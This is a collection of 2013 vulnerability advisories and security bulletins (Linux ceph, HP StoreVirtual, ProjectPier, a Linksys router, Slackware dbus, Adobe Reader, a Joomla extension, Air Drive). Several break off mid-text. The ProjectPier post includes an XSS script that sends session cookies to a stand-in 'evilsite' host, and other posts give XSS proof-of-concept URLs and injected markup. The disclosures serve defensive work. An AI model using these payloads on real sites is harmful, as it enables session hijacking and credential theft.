(CVE-2013-1059) Linux Kernel libceph Null Pointer Dereference Vulnerability
Original URL: http://hkpco.kr/advisory/CVE-2013-1059.txt Linux Kernel libceph Null Pointer Dereference Vulnerability (CVE-2013-1059) Author - Chanam Park (@hkpco) Website - http://hkpco.kr/ Date - 2013. 07. 06 0. Introduction This is very brief advisory just to record the vulnerability which I discovered in my spare time. A remote attacker, malicious ceph monitor, can make an exploit to cause a denial-of-service condition by sending the crafted auth_reply message. It could possibly lead to another impacts such as remote code execution if some other vulnerabilities are combined. An explanation is based on linux kernel 3.10 which is latest version now. 1. What's Ceph? Check these links below. http://en.wikipedia.org/wiki/Ceph_(storage) http://ceph.com/ 2. Vulnerability The vulnerability is triggered by a null pointer dereferencing problem which can raise a kernel crash remotely. Here, I will show you the code flow about vulnerability. Let's start with the dispatch() function which handles incoming auth message from the ceph monitor. http://lxr.linux.no/linux+v3.10/net/ceph/mon_client.c --- 963 static void dispatch(struct ceph_connection *con, struct ceph_msg *msg) 964 { 965struct ceph_mon_client *monc = con-private; 966int type = le16_to_cpu(msg-hdr.type); 967 968if (!monc) 969return; 970 971switch (type) { 972case CEPH_MSG_AUTH_REPLY: 973handle_auth_reply(monc, msg); *** [1] *** 974break; .. --- As shown in part [1], It calls handle_auth_reply() once ceph client receives the auth reply message from monitor. See handle_auth_reply() implementation in the same module, then. --- 886 static void handle_auth_reply(struct ceph_mon_client *monc, 887 struct ceph_msg *msg) 888 { 889int ret; 890int was_auth = 0; 891int had_debugfs_info, init_debugfs = 0; 892 893mutex_lock(monc-mutex); 894had_debugfs_info = have_debugfs_info(monc); 895was_auth = ceph_auth_is_authenticated(monc-auth); 896monc-pending_auth = 0; 897ret = ceph_handle_auth_reply(monc-auth, msg-front.iov_base, *** [2] *** 898 msg-front.iov_len, 899 monc-m_auth-front.iov_base, 900 monc-m_auth-front_max); .. --- At in part [2], It calls ceph_handle_auth_reply(). Move to take a look at the function. http://lxr.linux.no/linux+v3.10/net/ceph/auth.c --- 174 int ceph_handle_auth_reply(struct ceph_auth_client *ac, 175 void *buf, size_t len, 176 void *reply_buf, size_t reply_len) 177 { 178void *p = buf; 179void *end = buf + len; 180int protocol; .. 239ret = ac-ops-handle_reply(ac, result, payload, payload_end); 240if (ret == -EAGAIN) { 241ret = ceph_build_auth_request(ac, reply_buf, reply_len); *** [3] *** 242} else if (ret) { 243pr_err(auth method '%s' error %d\n, ac-ops-name, ret); 244} --- As you can see in the part [3] above, ceph_build_auth_request() contains a vulnerable code to cause the null pointer dereference. Let's see how the function implements a vulnerable code below. http://lxr.linux.no/linux+v3.10/net/ceph/auth.c --- 144 static int ceph_build_auth_request(struct ceph_auth_client *ac, 145 void *msg_buf, size_t msg_len) 146 { 147struct ceph_mon_request_header *monhdr = msg_buf; 148void *p = monhdr + 1; 149void *end = msg_buf + msg_len; 150int ret; 151 152monhdr-have_version = 0; 153monhdr-session_mon = cpu_to_le16(-1); 154monhdr-session_mon_tid = 0; 155 156ceph_encode_32(p, ac-protocol); 157 158ret = ac-ops-build_request(ac, p + sizeof(u32), end); *** [3] *** 159if (ret 0) { 160pr_err(error %d building auth method %s request\n, ret, 161 ac-ops-name); 162goto out; 163} 164dout( built request %d bytes\n, ret); 165ceph_encode_32(p, ret); 166ret = p + ret - msg_buf; 167 out: 168return ret; 169 } --- The code above, at part [3], calls a function pointer from ceph_auth_client structure without any value checking whether it's null or something else. Moreover, you can see in the next part soon, some function pointers in the structure hasn't been defined at all. Here's the problematic structure prototypes below. http://lxr.linux.no/linux+v3.9.6/include/linux/ceph/auth.h --- .. 25 struct ceph_auth_client_ops { 26const char *name; 27 .. 40/* 41 * build requests and process replies during monitor 42 * handshake. if
[security bulletin] HPSBST02896 rev.1 - HP StoreVirtual Storage, Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03825537 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03825537 Version: 1 HPSBST02896 rev.1 - HP StoreVirtual Storage, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-09 Last Updated: 2013-07-09 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with the HP StoreVirtual Storage. This vulnerability could be remotely exploited to gain unauthorized access to the device. All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access is provided by the customer. This functionality cannot be disabled today. HP has acknowledged this vulnerability and will provide a patch that will allow customers to disable the support access mechanism on or before July 17, 2013. HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ) however root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access to prevent repeated access to the system with the same pass phrase. Root access to the LeftHand OS does not provide access to the user data being stored on the system. References: CVE-2013-2352 (SSRT101257) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. This issue effects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier. HP StoreVirtual device HP P4300 HP P4500 HP P4300 G2 HP P4500 G2 HP P4800 G2 HP P4900 G2 HP P4000 VSA HP StoreVirtual 4130 HP StoreVirtual 4330 HP StoreVirtual 4530 HP StoreVirtual 4630 HP StoreVirtual 4730 HP StoreVirtual VSA LeftHand NSM2060 Dell PowerEdge 2950 HP DL320S IBM System x3650 LeftHand NSM2060 G2 LeftHand NSM2120 G2 LeftHand VSA BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2352(AV:N/AC:L/Au:N/C:N/I:C/A:C) 9.4 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com RESOLUTION HP will provide a patch that will allow customers to disable the support access mechanism on or before July 17, 2013. When the patch for this issue is available, customers will need to upgrade their HP StoreVirtual systems in order to have the ability to disable support access. HP Support may still request root access to customer systems in order to resolve certain support issues. HISTORY Version:1 (rev.1) - 9 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any
Re: Project Pier Web Vulnerabilities
Mitre has assigned the following CVE's for these issues in Project Pier: XSS: CVE-2013-3635 Session cookies lack HttpOnly flag: CVE-2013-3636 Session cookies lack Secure flag: CVE-2013-3637 On Tue, May 21, 2013 at 9:26 PM, the infinitenigma theinfiniteni...@gmail.com wrote: Summary Software : ProjectPier Version : 0.8.8 (other versions untested) Website : http://www.projectpier.org Issue : XSS (stored), Insecure Cookie storage CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N) CVSS Score: 7.9 Researcher: Carl Benedict Product Description ProjectPier is a Free, Open-Source, PHP web application for managing tasks, projects and teams through an intuitive web interface. Details The ProjectPier web application is affected by stored XSS and insecure cookie storage. The combination of these two vulnerabilities can lead to full compromise of application credentials by stealing session cookies. The stored XSS can be found in the Contact Name, Contact Company Name, Contact Description fields. Proof of Concept Enter any of the following strings into the Contact Name, Contact Company Name, and Company Description fields will generate a JavaScript alert dialog when viewing Contacts: scriptalert(1)/script %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Cookie insecurity: The session cookies are not protected by the HttpOnly or Secure flags, allowing them to be accessed via JavaScript and sent over HTTP. Basic JavaScript alert, returning cookie values: scriptalert(document.cookie)/script JavaScript that sends all cookie values to 'http://evilsite' for logging and reuse on the attacker side: scriptvar url1 = img src=http://evilsite/; + encodeURIComponent(document.cookie) + ; document.writeln(url1); /script History 11/07/2012 : Initial contact 11/07/2012 : Vendor response. Fix planned 11/12/2012 : Update requested 05/21/2013 : No updates. Advisory released References Bug Report : http://www.projectpier.org/node/4520 Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg -- ∞ -- ∞
Re: Cisco/Linksys E1200 N300 Reflected XSS
Mitre has assigned the following CVE for this issue: CVE-2013-2679 On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict theinfiniteni...@gmail.com wrote: Summary Software : Cisco/Linksys Router OS Hardware : E1200 N300 (others currently untested) Version : 2.0.04 (others currently untested) Website : http://www.linksys.com Issue : Reflected XSS Severity : Medium Researcher: Carl Benedict (theinfinitenigma) Product Description The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch. Details The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful. Sample URL #1 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27 Sample URL #2 (HTTP GET request): http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27change_action=submit_type=action=Applynow_proto=dhcpdaylight_time=1switch_mode=0hnap_devicename=Cisco10002need_reboot=0user_language=wait_time=0dhcp_start=100dhcp_start_conflict=0lan_ipaddr=4ppp_demand_pppoe=9ppp_demand_pptp=9ppp_demand_l2tp=9ppp_demand_hb=9wan_ipv6_proto=dhcp-tunneldetect_lang=ENwan_proto=dhcpwan_hostname=wan_domain=mtu_enable=0lan_ipaddr_0=192lan_ipaddr_1=168lan_ipaddr_2=1lan_ipaddr_3=1lan_netmask=255.255.255.0machine_name=Cisco10002lan_proto=dhcpdhcp_check=dhcp_start_tmp=100dhcp_num=50dhcp_lease=0wan_dns=4wan_dns0_0=0wan_dns0_1=0wan_dns0_2=0wan_dns0_3=0wan_dns1_0=0wan_dns1_1=0wan_dns1_2=0wan_dns1_3=0wan_dns2_0=0wan_dns2_1=0wan_dns2_2=0wan_dns2_3=0wan_wins=4wan_wins_0=0wan_wins_1=0wan_wins_2=0wan_wins_3=0time_zone=-08+1+1_daylight_time=1 History 04/26/2013 : Discovery 04/27/2013 : Advisory released -- ∞ -- ∞
[slackware-security] dbus (SSA:2013-191-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] dbus (SSA:2013-191-01) New dbus packages are available for Slackware 14.0, and -current to fix a security issue. Here are the details from the Slackware 14.0 ChangeLog: +--+ patches/packages/dbus-1.4.20-i486-4_slack14.0.txz: Rebuilt. This update fixes a security issue where misuse of va_list could be used to cause a denial of service for system services. Vulnerability reported by Alexandru Cornea. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2168 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/dbus-1.4.20-i486-4_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/dbus-1.4.20-x86_64-4_slack14.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/dbus-1.6.12-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/dbus-1.6.12-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: a720afc6cb939df64d9b6e15ad3d20ff dbus-1.4.20-i486-4_slack14.0.txz Slackware x86_64 14.0 package: ff619d4caa1c438435bad5cc5d57c24c dbus-1.4.20-x86_64-4_slack14.0.txz Slackware -current package: f3f0e28aecabb58b212d3bd580a194e4 a/dbus-1.6.12-i486-1.txz Slackware x86_64 -current package: cfd43378f0947229b58e95396192a7b7 a/dbus-1.6.12-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg dbus-1.4.20-i486-4_slack14.0.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlHdCpYACgkQakRjwEAQIjNTkQCcDY2QBBIqdHcs3H6ZAeN2oJIs ztoAnAtq6+XVK761M+wzxyRfmV8e13lJ =dGYh -END PGP SIGNATURE-
VULNERABLE (3rd party) components in Adobe Reader 11.0.03, and dangling reference to Acrobat.exe
Hi @ll, the current Adobe Reader 11.0.03 installs the following VULNERABLE (3rd party) components: 1. Adobe Flash Player Plugin 11.5.502.110 | X:\filever.exe /S %ProgramFiles%\Adobe\npswf*.dll |x:\program files\adobe\reader 11.0\reader\npswf*.dll | --a-- W32i DLL ENU11.5.502.110 shp 14,588,632 05-11-2013 npswf32.dll Cf. http://www.adobe.com/support/security/bulletins/apsb13-17.html, http://www.adobe.com/support/security/bulletins/apsb13-16.html, http://www.adobe.com/support/security/bulletins/apsb13-14.html, http://www.adobe.com/support/security/bulletins/apsb13-11.html http://www.adobe.com/support/security/bulletins/apsb13-09.html, http://www.adobe.com/support/security/bulletins/apsb13-08.html, http://www.adobe.com/support/security/bulletins/apsb13-05.html, http://www.adobe.com/support/security/bulletins/apsb13-04.html, http://www.adobe.com/support/security/bulletins/apsb13-01.html and http://www.adobe.com/support/security/bulletins/apsb12-27.html The wise guys at Adobe missed 10 security updates of their own product! 2. MSVC++ 2008 runtime libraries 9.0.21022.8 | X:\filever.exe /S %SystemRoot%\WinSxS\msvc?90.dll | x:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvc?90.dll | --a-- W32i DLL ENU 9.0.21022.8 shp224,768 11-06-2007 msvcm90.dll | --a-- W32i DLL ENU 9.0.21022.8 shp568,832 11-07-2007 msvcp90.dll | --a-- W32i DLL ENU 9.0.21022.8 shp655,872 11-07-2007 msvcr90.dll These DLLs have been updated several times since 2007-11-07, cf. http://support.microsoft.com/kb/973551 and http://support.microsoft.com/kb/973552 alias http://www.microsoft.com/technet/security/bulletin/ms09-035 as well as http://support.microsoft.com/kb/2467174 and http://support.microsoft.com/kb/2538243 alias http://www.microsoft.com/technet/security/bulletin/ms11-025 JFTR: Adobe Reader XI was released 2012-09-24, more than one year after MS11-025! 3. MSVC++ 2010 runtime libraries 10.0.40219.1 | X:\filever.exe /S %SystemRoot%\System32\msvc?100.dll |x:\windows\system32\msvcp100.dll | --a-- W32i DLL ENU10.0.40219.1 shp421,200 02-19-2011 msvcp100.dll |x:\windowsp\system32\msvcr100.dll | --a-- W32i DLL ENU10.0.40219.1 shp773,968 02-19-2011 msvcr100.dll Cf. http://support.microsoft.com/kb/24671743 and http://support.microsoft.com/kb/2565063 alias http://www.microsoft.com/technet/security/bulletin/ms11-025 JFTR: Adobe Reader XI was released 2012-09-24, more than one year after MS11-025! Unfortunately, the wise guys at Adobe don't know the platform on which their product runs and include the MSVC++ 2008 and 2010 runtimes via MSI merge module. Due to a well-known idiosyncrasy of Windows Update Agent M$FT components installed via MSI merge module are NOT detected and thus not updated by M$FT ... although M$FT advises their users to do so! From the FAQ section of http://www.microsoft.com/technet/security/bulletin/ms11-025 | In the case where a system has no MFC applications currently installed but | does have the vulnerable Visual Studio or Visual C++ runtimes installed, | Microsoft recommends that users install this update as a defense-in-depth | measure, in case of an attack vector being introduced or becoming known at | a later time. 4. Additionally, the following dangling references to Acrobat.exe are created: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.acrobatsecuritysettings\OpenWithList\Acrobat.exe] @= [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pdfxml\OpenWithList\Acrobat.exe] @= [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AcroExch.Document.11\protocol\StdFileEditing\server] @=\Acrobat.exe\ The latter allows the execution of a rogue program named Acrobat.exe from CWD via OLE in the security context of the logged on user. Cf. http://technet.microsoft.com/security/advisory/2269637 5. On Window XP the following superfluous registry entries are created: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B3FB63-66F4-4EFC-B717-BB283B85E79B}] Policy=dword:0003 AppPath=X:\\Program Files\\Adobe\\Reader 11.0\\Reader\\ AppName=AcroBroker.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{358E6F10-DE8A-4602-8424-179CA217F8EE}] Policy=dword:0003 AppPath=X:\\Program Files\\Adobe\\Reader 11.0\\Reader AppName=AcroRd32Info.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{76E2369A-75BA-41F9-8B9E-16059E5CF9A6}] Policy=dword:0003 AppPath=X:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\ AppName=AdobeARM.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8E1F80F4-953F-41E7-8460-E64AE5BE4ED3}] Policy=dword:0003
[Foreground Security 2013-001]: Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting (XSS) vulnerability
Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting (XSS) vulnerability FOREGROUND SECURITY, SECURITY ADVISORY 2013-001 - Original release date: July 10, 2013 - Discovered by: Adam Willard (Software Security Analyst at Foreground Security) - Verified by: Jose Carlos de Arriba (Pentest Team Manager at Foreground Security) - Contact: (awillard (at) foregroundsecurity (dot) com) - Severity: 4.3/10 (Base CVSS Score) I. VULNERABILITY - Algis Info aiContactSafe Extension 2.0.19 (latest) Cross-Site Scripting (XSS) vulnerability - (prior versions have not been checked but could be vulnerable too). II. BACKGROUND - Algis Info aiContactSafe is a native Joomla component developed by Algis Info. You can use it to place a complex contact form on your web page. Here are some of the facilities that it can offer: - custom fields - captcha - custom text related to the contact informations - multilingual support ( through Joomfish ) - SEFthrough Artio JoomSEF or sh404SEF III. DESCRIPTION - Algis Info aicontactsafe 2.0.19 (latest) Extension presents a Cross-Site Scripting (XSS) vulnerability in the url due to an insufficient input/output sanitization. A malicious user could perform session hijacking or phishing attacks. IV. PROOF OF CONCEPT - (This section has been removed per vendor request). V. BUSINESS IMPACT - An attacker could perform session hijacking or phishing attacks. VI. SYSTEMS AFFECTED - Joomla Extension, AlgisInfo com_aicontactsafe_2_0_19_stable Extension (prior versions have not been checked but could be vulnerable too). VII. SOLUTION - Fixed on 2.0.21.stable version release. VIII. REFERENCES - http://www.algisinfo.com/ http://www.foregroundsecurity.com/ IX. CREDITS - This vulnerability has been discovered by Adam Willard (awillard (at) foregroundsecurity (dot) com), verification and release coordination by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com). X. REVISION HISTORY - - July 10, 2013: Initial release. XI. DISCLOSURE TIMELINE - April 2, 2013: Vulnerability discovered by Adam Willard. April 3, 2013: Vulnerability verified by Jose Carlos de Arriba. April 15: AlgisInfo aiContactSafe Author contacted by email. April 15: Response from author and security advisory sent to him. April 16: Vulnerability fixed on 2.0.21.stable version release July 10: Security advisory released XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. Jose Carlos de Arriba, CISSP Pentest Team Manager Foreground Security 305-340-9964 jcarriba (at) foregroundsecurity . com www.foregroundsecurity.com
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
Title: == Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability Date: = 2013-07-09 References: === http://www.vulnerability-lab.com/get_content.php?id=1000 VL-ID: = 1000 Common Vulnerability Scoring System: 6.7 Introduction: = Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required. Features ... [Server] function Easily access your files from any web browser. Easily upload and download your photo from photo libraries via web browser. [My Files] function Preview/Move/Copy/Delete/Unzip/Rename/Email file and Create new directory on your iPhone, iPod touch iPad. Image: png, jpg, gif Document: Word, PowerPoint, Excel, PDF Compressed: zip Text-base: txt, html, php, js, css Media: mp3, wav, mp4, mov Save Word, PowerPoint, Excel and PDF files from other apps to Air Drive, include Apple’s Email app and Safari. Open All types of file from Air Drive to other apps such as Dropbox. [Settings] function Add Password to prevent unauthorized access to your files. Customize the Server port and Real-time On/Off the sharing functions and takes effect immediately to restrict the access from web browser (Copy of the Homepage: https://itunes.apple.com/de/app/air-drive-plus-your-file-manager/id422806570 ) Abstract: = The Vulnerability Laboratory Research Team discovered a remote file include vulnerability in the Air Drive Plus 2.4 application (Apple iOS - iPadiPhone). Report-Timeline: 2013-07-09:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: Air Drive Plus 2.4 Exploitation-Technique: === Remote Severity: = High Details: A local file include and arbitrary file upload web vulnerability is detected in the Air Drive Plus 2.4 application (Apple iOS - iPadiPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on application-side of the service. The vulnerability is located in the file upload/add (AirDriveAction_file_add) module of the web-server (http://localhost:8000/) when processing to request a manipulated filename via POST. The injected file will be accessable via the index listing module of the application. Remote attackers can exchange the filename with a double or tripple extension bia POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php codes. A persistent script code injection is detected in the filename parameter. Attackers can tamper the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to unauthorized access application data/apps or restricted application information. The execution of the persistent code also occurs when an application user is processing to delete the malicious context. The injected code is stored and will be executed from the delete notification and protection message. Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] Air Drive Plus 2.4 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable File(s): [+] AirDriveAction_file_add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Application Index Listing (http://localhost:8000/) Proof of Concept: = The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction. For demonstration or reproduce ... 1.1 trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px/tdtda target=_blank href=http://192.168.2.104:8000/AirDriveAction_file_show/;/private/var/mobile/Applications;;/private/var/mobile/Applications//a/td td27,27KB/tdtd align=center2013-07-08 23:07:52/tdtd align=center a onclick=javascript:delfile(/private/var/mobile/Applications); class=transparent_buttonDelete/a/td/tr 1.2 trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px/tdtda target=_blank